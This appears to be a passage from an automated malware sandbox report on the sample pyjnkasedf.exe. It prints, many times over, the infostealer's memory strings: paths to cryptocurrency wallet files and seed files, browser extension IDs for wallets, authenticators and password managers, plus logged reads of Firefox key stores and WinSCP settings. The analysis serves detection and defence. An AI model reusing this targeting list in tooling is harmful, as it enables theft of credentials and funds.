Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: pyjnkasedf.exe, 00000000.00000002.2023659585.000000000092E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: MetaMask|1|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|MetaMask|1|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|1|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|TronLink|1|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|BinanceChainWallet|1|fhbohimaelbohpjbbldcngcnapndodjp|1|1|0|Yoroi|1|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase|1|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|1|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|1|iWallet|1|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|RoninWallet|1|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|1|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CloverWallet|1|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|LiqualityWallet|1|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra_Station|1|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|1|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|AuroWallet|1|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|PolymeshWallet|1|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|1|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98|1|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|1|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain|1|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|1|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|1|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Oxygen (Atomic)|1|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|PaliWallet|1|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|NamiWallet|1|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Solflare|1|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|CyanoWallet|1|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|1|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|1|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Goby|1|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|RoninWalletEdge|1|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|UniSat Wallet|1|ppbibelpcjmhbdihakflkdcoccbgbkpo|1|0|0|Authenticator|0|bhghoamapcdpbohphigoooaddinpkbai|1|1|0|GAuth Authenticator|0|ilgcnhelpchnceeipipijaljkblbcobl|1|1|1|Tronium|1|pnndplcbkakcplkjnolgbkdgjikjednm|1|0|0|Trust Wallet|1|egjidjbpglichdcondbcbdnbeeppgdph|1|0|0|Exodus Web3 Wallet|1|aholpfdialjgjfhomihkjbmgjidlcdno|1|0|0|Braavos|1|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|1|kkpllkodjeloidieedojogacfhpaihoh|1|0|0|OKX Web3 Wallet|1|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender|1|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|1|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|GeroWallet|1|bgpipimickeadkjlklgciifhnalhdjhe|1|0|0|Pontem Wallet|1|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Finnie|1|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra|1|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Microsoft AutoFill|0|fiedbfgcleddlbcmgdigjgdfcggjcion|1|0|0|Bitwarden|0|nngceckbapebfimnlniiiahkandclblb|1|0|0|KeePass Tusk|0|fmhmiaejopepamlcjkncpgpdjichnecm|1|0|0|KeePassXC-Browser|0|oboonakemofpalcgghocfoadofidjkkk|1|0|0|Rise - Aptos Wallet|1|hbbgbephgojikajhfbomhlmmollphcad|1|0|0|Rainbow Wallet|1|opfgelmcmbiajamepnmloijbpoleiama|1|0|0|Nightly|1|fiikommddbeccaoicoejoniammnalkfa|1|0|0|Ecto Wallet|1|bgjogpoidejdemgoochpnkmdjpocgkha|1|0|0|Coinhub|1|jgaaimajipbpdogpdglhaphldakikgef|1|0|0|Leap Cosmos Wallet|1|fcfcfllfndlomdhbehjjcoimbgofdncg|1|0|0|MultiversX DeFi Wal
            Source: pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: C:\Users\user\Desktop\pyjnkasedf.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\security_state\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
